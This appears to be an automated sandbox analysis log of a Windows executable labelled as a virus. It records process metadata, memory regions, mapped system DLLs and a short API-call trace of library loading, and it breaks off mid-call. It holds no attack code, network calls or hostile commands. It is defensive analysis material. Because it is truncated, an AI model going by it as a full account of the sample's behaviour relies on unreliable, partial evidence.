# Flog Txt Version 1 # Analyzer Version: 4.5.0 # Analyzer Build Date: Apr 22 2022 21:04:16 # Log Creation Date: 05.05.2022 07:01:27.122 Process: id = "1" image_name = "d2ce3b2a5f3efb1fcede96304e57a531.virus.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe" page_root = "0x70943000" os_pid = "0x13dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x78c" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 121 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 122 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 123 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 124 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 125 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 126 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 127 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 128 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 129 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 130 start_va = 0x400000 end_va = 0x43bfff monitored = 1 entry_point = 0x4034f7 region_type = mapped_file name = "d2ce3b2a5f3efb1fcede96304e57a531.virus.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d2ce3b2a5f3efb1fcede96304e57a531.virus.exe") Region: id = 131 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 132 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 133 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 134 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 135 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 136 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 275 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 276 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 277 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 278 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 279 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 280 start_va = 0x530000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 281 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 282 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 283 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 284 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 285 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 286 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 287 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 288 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 289 start_va = 0x530000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 290 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 291 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 292 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 293 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 294 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 295 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 296 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 297 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 298 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 299 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 300 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 301 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 302 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 303 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 304 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 305 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 306 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 307 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 308 start_va = 0x753d0000 end_va = 0x754bafff monitored = 0 entry_point = 0x7540d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 309 start_va = 0x6ce60000 end_va = 0x6cef1fff monitored = 0 entry_point = 0x6ce6dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 310 start_va = 0x790000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 311 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 312 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 313 start_va = 0x960000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 314 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 315 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 316 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 317 start_va = 0x970000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 318 start_va = 0xb00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 319 start_va = 0x1f00000 end_va = 0x1f90fff monitored = 0 entry_point = 0x1f38cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 320 start_va = 0x1f00000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 321 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 322 start_va = 0x1ff0000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 323 start_va = 0x705f0000 end_va = 0x70608fff monitored = 0 entry_point = 0x705f47e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 324 start_va = 0x74890000 end_va = 0x74c9afff monitored = 0 entry_point = 0x748badf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 325 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 326 start_va = 0x724f0000 end_va = 0x7263afff monitored = 0 entry_point = 0x72551660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 327 start_va = 0x74660000 end_va = 0x746f1fff monitored = 0 entry_point = 0x74698cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 328 start_va = 0x6fe50000 end_va = 0x6fe6cfff monitored = 0 entry_point = 0x6fe53b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 329 start_va = 0x6ce00000 end_va = 0x6ce53fff monitored = 0 entry_point = 0x6ce1dc50 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 330 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 331 start_va = 0x74d20000 end_va = 0x74da3fff monitored = 0 entry_point = 0x74d46220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 332 start_va = 0x705a0000 end_va = 0x705c7fff monitored = 0 entry_point = 0x705a7820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 333 start_va = 0x6dc20000 end_va = 0x6dc27fff monitored = 0 entry_point = 0x6dc217b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 334 start_va = 0x6dc10000 end_va = 0x6dc15fff monitored = 0 entry_point = 0x6dc11570 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 335 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 336 start_va = 0x2180000 end_va = 0x24b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 337 start_va = 0x500000 end_va = 0x503fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 338 start_va = 0x920000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 339 start_va = 0x1ff0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 340 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 341 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 342 start_va = 0x670000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 343 start_va = 0x680000 end_va = 0x683fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 344 start_va = 0x1f00000 end_va = 0x1f16fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db") Region: id = 345 start_va = 0x1fe0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 346 start_va = 0x1f20000 end_va = 0x1f20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f20000" filename = "" Region: id = 347 start_va = 0x1f30000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 348 start_va = 0x24c0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 349 start_va = 0x25c0000 end_va = 0x2dcdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 350 start_va = 0x6cd70000 end_va = 0x6cdf0fff monitored = 0 entry_point = 0x6cd76310 region_type = mapped_file name = "riched20.dll" filename = "\\Windows\\SysWOW64\\riched20.dll" (normalized: "c:\\windows\\syswow64\\riched20.dll") Region: id = 351 start_va = 0x6d1a0000 end_va = 0x6d1b5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 352 start_va = 0x6cd30000 end_va = 0x6cd60fff monitored = 0 entry_point = 0x6cd422d0 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 353 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 354 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 355 start_va = 0x2dd0000 end_va = 0x2e8bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002dd0000" filename = "" Region: id = 356 start_va = 0x680000 end_va = 0x683fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 357 start_va = 0x1f70000 end_va = 0x1f71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f70000" filename = "" Region: id = 358 start_va = 0x1f80000 end_va = 0x1f80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f80000" filename = "" Region: id = 359 start_va = 0x1f90000 end_va = 0x1f94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 360 start_va = 0x25c0000 end_va = 0x2dc5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 361 start_va = 0x25c0000 end_va = 0x2dcafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 362 start_va = 0x25c0000 end_va = 0x2dcbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 363 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 1 os_tid = 0xafc [0111.061] SetErrorMode (uMode=0x8001) returned 0x0 [0111.076] GetVersionExW (in: lpVersionInformation=0x19fe40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19fe40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0111.077] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74580000 [0111.077] GetProcAddress (hModule=0x74580000, lpProcName="SetDefaultDllDirectories") returned 0x77556270 [0111.077] SetDefaultDllDirectories (DirectoryFlags=0xc00) returned 1 [0111.077] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0111.078] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\UXTHEME.dll") returned 12 [0111.080] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\UXTHEME.dll", hFile=0x0, dwFlags=0x8) returned 0x70610000 [0111.971] lstrlenA (lpString="UXTHEME") returned 7 [0111.971] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0111.971] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\USERENV.dll") returned 12 [0111.971] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\USERENV.dll", hFile=0x0, dwFlags=0x8) returned 0x705f0000 [0112.372] lstrlenA (lpString="USERENV") returned 7 [0112.372] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.372] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\SETUPAPI.dll") returned 13 [0112.372] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\SETUPAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x74890000 [0113.019] lstrlenA (lpString="SETUPAPI") returned 8 [0113.019] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.019] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\APPHELP.dll") returned 12 [0113.019] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\APPHELP.dll", hFile=0x0, dwFlags=0x8) returned 0x744b0000 [0113.505] lstrlenA (lpString="APPHELP") returned 7 [0113.505] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.505] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\PROPSYS.dll") returned 12 [0113.505] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\PROPSYS.dll", hFile=0x0, dwFlags=0x8) returned 0x724f0000 [0114.091] lstrlenA (lpString="PROPSYS") returned 7 [0114.091] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.091] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\DWMAPI.dll") returned 11 [0114.091] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\DWMAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x6fe50000 [0114.512] lstrlenA (lpString="DWMAPI") returned 6 [0114.512] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.513] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\CRYPTBASE.dll") returned 14 [0114.513] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\CRYPTBASE.dll", hFile=0x0, dwFlags=0x8) returned 0x74550000 [0114.513] lstrlenA (lpString="CRYPTBASE") returned 9 [0114.513] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.513] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\OLEACC.dll") returned 11 [0114.513] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\OLEACC.dll", hFile=0x0, dwFlags=0x8) returned 0x6ce00000 [0115.069] lstrlenA (lpString="OLEACC") returned 6 [0115.069] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0115.069] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\CLBCATQ.dll") returned 12 [0115.069] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\CLBCATQ.dll", hFile=0x0, dwFlags=0x8) returned 0x74d20000 [0115.392] lstrlenA (lpString="CLBCATQ") returned 7 [0115.393] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0115.393] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\NTMARTA.dll") returned 12 [0115.393] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\NTMARTA.dll", hFile=0x0, dwFlags=0x8) returned 0x705a0000 [0115.728] lstrlenA (lpString="NTMARTA") returned 7 [0115.728] GetModuleHandleA (lpModuleName="VERSION") returned 0x0 [0115.728] GetSystemDirectoryW (in: lpBuffer=0x19f928, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0115.728] wsprintfW (in: param_1=0x19f94e, param_2="%s%S.dll" | out: param_1="\\VERSION.dll") returned 12 [0115.728] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\VERSION.dll", hFile=0x0, dwFlags=0x8) returned 0x6dc20000 [0115.915] GetProcAddress (hModule=0x6dc20000, lpProcName="GetFileVersionInfoW") returned 0x6dc21570 [0115.915] GetModuleHandleA (lpModuleName="SHFOLDER") returned 0x0 [0115.916] GetSystemDirectoryW (in: lpBuffer=0x19f928, 